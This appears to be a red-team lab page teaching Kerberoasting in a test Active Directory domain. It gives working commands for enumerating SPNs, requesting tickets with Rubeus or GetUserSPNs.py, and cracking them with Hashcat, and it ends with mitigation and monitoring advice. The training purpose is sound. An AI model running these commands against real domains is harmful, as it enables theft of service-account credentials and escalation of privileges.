Kerberoasting – Red Team Lab #1 | RootDC.io attack spn tgs ticket

Learn how to exploit a classic Active Directory misconfiguration to extract service tickets (TGS) and crack them offline to recover plain-text credentials.  

This lab is essential for mastering post-compromise escalation via Kerberos SPN abuse. attack spn tgs ticket red team

• Understand the Kerberoasting attack path
• Enumerate SPNs in a domain using setspn, PowerView or Impacket
• Request TGS tickets from a domain controller
• Extract tickets with Rubeus or GetUserSPNs.py
• Crack the tickets offline using Hashcat
• Identify weak service account passwords and mitigate risk attack spn red team

- 1x Domain Controller (Windows Server 2019 or 2022)

- 1x Domain-joined Windows 10 machine (victim workstation)

- 1x Attacker machine (Kali Linux or Windows with Rubeus installed)

🧩 Domain: `rootdc.local`  

🧑‍💼 Domain user: `hacker@rootdc.local` attack spn tgs ticket red team

• Rubeus (https://github.com/GhostPack/Rubeus) 
• Hashcat (https://hashcat.net/hashcat/)
• Impacket (optional for Python lovers)
• AD Explorer / PowerView (optional for enumeration)

1.  Log in as hacker@rootdc.local on your attacker VM.
    
2. Enumerate SPNs:

• With PowerView: Get-NetUser -SPN
• With Impacket: GetUserSPNs.py rootdc.local/hacker -dc-ip <DC-IP>

3. Request a TGS ticket:

• With Rubeus: Rubeus.exe kerberoast
   

4. Export the ticket to file
 

5. Crack the hash:
 

• hashcat -m 13100 ticket.hash /wordlists/rockyou.txt
   

6. Analyze the cracked credentials
 

7. Suggest mitigation:
 

• Complex passwords
   
• No SPN on sensitive accounts
   
• gMSA accounts where possible
   

• 🔗 Download Rubeus
   
• 🔗 Example Hashcat Command
   
• 🔗 Download PowerView
   

- Use strong, complex passwords for service accounts

- Regularly rotate credentials for accounts with SPNs

- Avoid using standard user accounts for services

- Implement tiered admin model and log all TGS requests

- Monitor for abnormal Kerberos activity in SIEM